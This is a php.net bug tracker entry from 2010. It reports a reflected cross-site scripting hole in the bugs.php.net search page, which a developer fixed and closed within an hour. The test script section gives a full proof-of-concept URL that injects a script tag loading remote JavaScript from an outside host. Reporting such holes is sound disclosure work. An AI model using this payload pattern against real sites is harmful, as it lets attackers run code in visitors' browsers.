php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #51722 Cross Site Scripting Vulnerability on Bug Tracking Site
Submitted: 2010-05-02 23:25 UTC Modified: 2010-05-03 00:13 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: tedivm at tedivm dot com Assigned: derick (profile)
Status: Closed Package: Website problem
PHP Version: Irrelevant OS:
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If this is not your bug, you can add a comment by following this link.
If this is your bug, but you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: tedivm at tedivm dot com
New email:
PHP Version: OS:

 

 [2010-05-02 23:25 UTC] tedivm at tedivm dot com
Description:
------------
The bugs.php.net search engine does not sanitize it's input, thus allowing an xss 
attack.

The vulnerability has been posted on a blog and reposted on Reddit 
(http://www.reddit.com/r/netsec/comments/bz4fw/php_website_xss_defacement/), but 
since I didn't see a bug report for it and it's 
still active I'm assuming it hasn't been picked up by you guys.

Test script:
---------------
http://bugs.php.net/search.php?cmd=display&search_for=&php_os=&php_os_not=&author_email=&bug_type=&boolean=0&bug_age=%22%3E%3Cscript%20src=%22http://www.yourjavascript.com/38310202111/xss.js%22%20/%3E%3C&bug_updated=0&order_by=id&direction=DESC&limit=30&phpver=&assign=&status=Open&begin=0

Expected result:
----------------
I expect the injected javascript not to run.

Actual result:
--------------
The injected javascript runs.

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2010-05-03 00:12 UTC] derick@php.net
Automatic comment from SVN on behalf of derick
Revision: http://svn.php.net/viewvc/?view=revision&revision=298885
Log: - Fixed bug #51722.
 [2010-05-03 00:13 UTC] derick@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: derick
 [2010-05-03 00:13 UTC] derick@php.net
This bug has been fixed in SVN. Since the websites are not directly
updated from the SVN server, the fix might need some time to spread
across the globe to all mirror sites, including PHP.net itself.

Thank you for the report, and for helping us make PHP.net better.

Thanks for the report!
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sun Feb 25 12:01:27 2024 UTC